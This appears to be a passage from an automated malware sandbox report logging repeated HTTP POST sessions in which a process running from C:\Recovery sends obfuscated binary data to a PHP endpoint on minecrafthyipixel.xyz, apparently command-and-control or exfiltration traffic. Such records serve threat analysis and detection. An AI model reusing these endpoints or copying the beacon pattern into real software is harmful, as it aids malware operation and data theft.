                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:44.345274925 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:44.345418930 CEST | 2512 | OUT | Data Raw: 57 58 5e 59 59 47 54 5c 5c 5e 59 59 57 51 58 58 54 56 5f 5c 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^YYGT\\^YYWQXXTV_\T_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[&..6; $005Q*;#Y&;%W42) 4<#.$[. X =
                                                                                                                                    Apr 19, 2024 13:43:44.608484983 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:44 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I02OcwB%2FoEzsdG31PEfiCGV0ZUUzt89ipdvfDFTxp9MGifckVOcRUBqnBuOgh3KnLfiSwrRzLY0A%2FPrrHUlgBHITBTf8JdM9gaF67WPX24Nh3QU8evpdbshP%2FlGE%2BiYn2fSKA8B2udI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca37ddd28071d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:44.608544111 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    111 | 192.168.2.4 | 49862 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:44.831482887 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:43:44.935870886 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:44.936037064 CEST | 2504 | OUT | Data Raw: 57 5e 5e 5b 59 42 54 5d 5c 5e 59 59 57 57 58 59 54 55 5f 5c 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^[YBT]\^YYWWXYTU_\T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1"++$0$+>)#\&#&V!"=)(7"/,^/%$[. X -
                                                                                                                                    Apr 19, 2024 13:43:45.291505098 CEST | 629 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dFdJ1%2BXM6ms6H8XVkYELY1SHKex%2FwPP4SpqL9DYn4fDbTvMtJtk%2BBB6sb%2B1By6pA%2Fx2z1ii%2F83AGJthMNbDJE847J%2BEiQGXafgb9wmrpEJdMrlZvtLmmqk3mhSQ3f0fcPv9OHC%2FgBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3818c5312f5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:45.291563988 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    112 | 192.168.2.4 | 49863 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:45.516130924 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:45.620919943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:45.621064901 CEST | 2512 | OUT | Data Raw: 57 5c 5e 5f 59 45 54 54 5c 5e 59 59 57 52 58 5f 54 5a 5f 57 54 5b 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^_YETT\^YYWRX_TZ_WT[S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.%!,]$V$$]"=;?_%$+&R4U=?\"? :5$[. X 1
                                                                                                                                    Apr 19, 2024 13:43:45.880753994 CEST | 633 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:45 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlmWJ7IoxJ%2BhLi%2FQMVY75QiU%2BvtkV%2B%2FOrGYyAemOpCayq7zj15ur%2BEiYt%2BjoveuZilZIO84h3L%2Fwgep%2FwwWE1mlvzI0Q2OUzRjwCfzGlSwUqVwqMp8n%2BBiID0HzNKQyP38V6GiWqdXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca385de0a458f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:45.880781889 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    113 | 192.168.2.4 | 49864 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:46.127741098 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:46.232368946 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:46.232537031 CEST | 2512 | OUT | Data Raw: 52 5d 5b 5c 5c 46 54 54 5c 5e 59 59 57 56 58 5d 54 5a 5f 57 54 55 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][\\FTT\^YYWVX]TZ_WTUSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%X>S +Z'0$;=V)7Y2)(V%6Q 1>($#,<[-$[. X !
                                                                                                                                    Apr 19, 2024 13:43:46.503349066 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:46 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAGyyqg%2B8pkSTvQ9Zp0SYUiGEqN6%2B6ANx8q5Dxa9EcYVC8TC%2Bw6RS9PAh7z0xy0gfjjLNHDL6QjunyTYhUWhjMgu6Y0vt0wsUaP%2B%2FVC14iwW7NHgsQ6ZL8mvDcG6Zq8TDzJ%2FIzYW2Pc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca389aa1e53ff-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:46.503376007 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    114 | 192.168.2.4 | 49865 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:46.733078957 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:46.838105917 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:46.838356972 CEST | 2512 | OUT | Data Raw: 57 55 5b 5e 59 47 54 5b 5c 5e 59 59 57 54 58 5c 54 56 5f 5c 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[^YGT[\^YYWTX\TV_\TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2>V5;/3%;=2:$%("P7.U*']4'9$[. X )
                                                                                                                                    Apr 19, 2024 13:43:47.201931000 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ych6cQB%2F1MzxLcCf%2FoxeYNg%2B6uOgO8AYmRRA4kwoZ87dKqlthLKI5ivI%2FmXXNU1n4IDkzibf55zu0UkfBhLv%2Bb3C9303cC%2F5Qh14CMKotz7C22RRSrroPZPnz9g0y2Hw%2FZ1YX5rxHXA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca38d6c00ad5f-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:47.201961994 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    115 | 192.168.2.4 | 49866 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:47.424376011 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:47.529381037 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:47.529648066 CEST | 2504 | OUT | Data Raw: 57 5c 5b 5c 59 45 54 5b 5c 5e 59 59 57 57 58 5c 54 55 5f 56 54 5d 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[\YET[\^YYWWX\TU_VT]SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%& ++$8$)Q=(3Y1?1+4>=; 7?<\:$[. X
                                                                                                                                    Apr 19, 2024 13:43:47.793946028 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:47 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvR2KUpKpXSoZ7F9vYBgtSL2eXBt7GDa8WnoPmeL5Z%2Bqg3zRZWcdDMLcGp4tOtKthyoDjv4t8B2XKtGG0AOXje%2B8Sa3b9bVmazTSoeWEaHo5%2FVYMGfMHTPTpYIPw6t%2FoWLJTYdQVCtQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca391b8914505-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:47.793972015 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    116 | 192.168.2.4 | 49867 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:48.033082962 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:48.137466908 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:48.137840033 CEST | 2512 | OUT | Data Raw: 57 5d 5e 5d 5c 47 51 5d 5c 5e 59 59 57 5f 58 53 54 50 5f 5d 54 58 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^]\GQ]\^YYW_XSTP_]TXS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.%"8#07\$-W?8\18R%(.R#1)'[ #/%$[. X
                                                                                                                                    Apr 19, 2024 13:43:48.503964901 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:48 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXF%2BuHT67Pujp8dIJnfFFN2QYM8OQVIK6ejv1R1%2FIkkVMHjGH66IIQV5g8%2FvzaoRfBe2S0%2F7M9F3TTJ6j8lVuA6XrDFDRWKIT5r0C0Nky7hDoRrp0qZtzh46nDmXm44Wv34txuu0tlo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3958b821357-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:48.504029036 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    117 | 192.168.2.4 | 49868 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:48.735728979 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:48.840141058 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:48.840322018 CEST | 2512 | OUT | Data Raw: 52 59 5e 5e 5c 47 54 5d 5c 5e 59 59 57 53 58 5f 54 5a 5f 5c 54 5c 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^^\GT]\^YYWSX_TZ_\T\SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\&% +4Y$#7_%(-V*+8')$V16R712V>8 ,//%$[. X 5
                                                                                                                                    Apr 19, 2024 13:43:49.209698915 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNP8rDNLfyX2NbbjMTZqwkMVYfth6tTMmvvVCY2wCeQRONGiHUE57mE0YWVqwC3RPchhWgGooL7GGsyhTClMnULlm1dwcNgLPgmNkH2KF3%2F7KEe3acsmrN31N3HCWmhrCW9wIxoeJok%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca399edd953b6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:43:49.209764004 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    118 | 192.168.2.4 | 49869 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:43:49.255491972 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:43:49.359958887 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:49.360155106 CEST | 2180 | OUT | Data Raw: 57 5e 5b 5e 5c 43 54 5f 5c 5e 59 59 57 57 58 5c 54 55 5f 5e 54 58 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^[^\CT_\^YYWWX\TU_^TXSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&1>&!;Y$%(5V=^#X2)+$(*4"V='4/.$[. X
                                                                                                                                    Apr 19, 2024 13:43:49.632520914 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:49 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zujVP3G%2BlbKXmoJ0QlL4%2FaPQvkk5MqbECDVlQdTsk2qGGxrEpHr0TJSWjo5tG9CiCU8nDDjNJZAUZky%2BwyDrD%2FwTAV3e3XWoYaesI1xaPA4cjNKVUETE5rUnqXwmXd3oq7Hn9%2FoKFZE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca39d2ac67bd8-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
